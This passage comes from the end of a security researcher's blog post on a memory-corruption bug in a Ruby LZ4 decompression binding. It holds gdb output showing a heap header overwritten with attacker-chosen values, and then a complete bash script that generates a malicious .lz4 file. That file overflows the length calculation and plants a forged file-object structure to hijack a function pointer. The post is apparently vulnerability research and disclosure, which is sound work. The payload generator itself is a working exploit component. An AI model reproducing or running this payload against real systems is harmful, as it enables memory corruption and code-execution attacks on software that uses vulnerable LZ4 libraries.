    argv=0xb793705c) at vm_insnhelper.c:1328
#4  0xb7ee63f7 in vm_call_cfunc_with_frame (th=th@entry=0x804abc8, reg_cfp=reg_cfp@entry=0xb79b6f68, 
    ci=ci@entry=0x83a1af0) at vm_insnhelper.c:1470
#5  0xb7ef55a9 in vm_call_cfunc (ci=0x83a1af0, reg_cfp=0xb79b6f68, th=0x804abc8) at vm_insnhelper.c:1560
#6  vm_call_method (th=0x804abc8, cfp=0xb79b6f68, ci=0x83a1af0) at vm_insnhelper.c:1754
#7  0xb7eec630 in vm_exec_core (th=0x804abc8, initial=initial@entry=0) at insns.def:1028
#8  0xb7ef1672 in vm_exec (th=th@entry=0x804abc8) at vm.c:1304
#9  0xb7ef8d11 in rb_iseq_eval_main (iseqval=iseqval@entry=137109680) at vm.c:1562
#10 0xb7d99489 in ruby_exec_internal (n=0xa5aff008) at eval.c:253
#11 0xb7d9af14 in ruby_exec_node (n=n@entry=0x82c20b0) at eval.c:318
#12 0xb7d9cebc in ruby_run_node (n=0x82c20b0) at eval.c:310
#13 0x08048758 in main (argc=2, argv=0xbffff144) at main.c:36
(gdb) break *0xb7d1b9ac
Breakpoint 2 at 0xb7d1b9ac: file lz4ruby.c, line 152.
(gdb) c
Continuing.
Breakpoint 2, lz4internal_uncompress (self=137898400, input=137896980, in_size=33702637, offset=9, 
    out_size=532742661) at lz4ruby.c:152
152       if (read_bytes < 0) {
(gdb) x/8xw 0xa5aff000
0xa5aff000:     0x082c6fe0      0x44332211      0x75caadde      0x76caadde
0xa5aff010:     0x88776655      0x77caadde      0x78caadde      0x79caadde
(gdb) 


It's easy to see in the output above that now we have successfully overwritten the Linux heap header with what *should* be our Python payload, but whatever. 

Summary


This is more proof that LZ4 is a fun algorithm to play with. It's a great and useful compression scheme, but the memory corruption overflow is a lot of fun, too. 

If you end up developing a working Ruby LZ4 payload, please reach out and contact Lab Mouse

Time's Up. The adjusted Ruby payload script is below.

Don A. Bailey
Lab Mouse Security
Founder / CEO
@InfoSecMouse

#!/bin/bash
#
# Ruby LZ4 payload generator - donb@securitymouse.com
# For Testing Only. Do Not Misuse. 
#

FILE=./test.lz4

append()
{      
        printf $1 >> $FILE
}

init()
{      
        rm -f $FILE
        touch $FILE
}

large()
{      
        x="\"\\xff\" x $1"
        perl -e "print $x" >> $FILE
}

append_size()
{      
        i=0
        while [ $i -lt $1 ]; do
                append $2
                i=$((i+1))
        done
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
#append "\xdd"
append "\xe5"

# PyFile_Type technique
# we need 76 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the ob_type
append "\xe0\x6f\x2c\x08"       # will point to PyFile_Type.file_dealloc()
append "\x11\x22\x33\x44"       # dummy arg for next function
append "\xde\xad\xca\x75"       # f_name
append "\xde\xad\xca\x76"       # f_mode
append "\x55\x66\x77\x88"       # dummy next function address
append "\xde\xad\xca\x77"       # f_softspace
append "\xde\xad\xca\x78"       # f_binary
append "\xde\xad\xca\x79"       # f_buf
append "\xde\xad\xca\x7a"       # f_bufend
append "\x00\x00\x00\x00"       # f_bufptr
append "\x00\x00\x00\x00"       # f_setbuf
append "\x00\x00\x00\x00"       # f_univ_newline
append "\x00\x00\x00\x00"       # f_newlinetypes
append "\x00\x00\x00\x00"       # f_skipnextlf
append "\x00\x00\x00\x00"       # f_encoding
append "\x00\x00\x00\x00"       # f_errors
append "\x00\x00\x00\x00"       # weakreflist
append "\x00\x00\x00\x00"       # unlocked_count

# don't exit with a bad ref here
append "\x00\x00"               # null ref

# last literal run (8192 bytes)
append "\xf0"                   # 15 bytes
large 32                        # (32 * 255)
append "\x11"                   # 17 completes the 8192

printf "\x82\x82\x82\x7f" > ruby_header.lz4
perl -e 'print "x" x 8192' > footer.lz4

echo 'ruby payload is ready'
cat ruby_header.lz4 test.lz4 footer.lz4 > ruby.lz4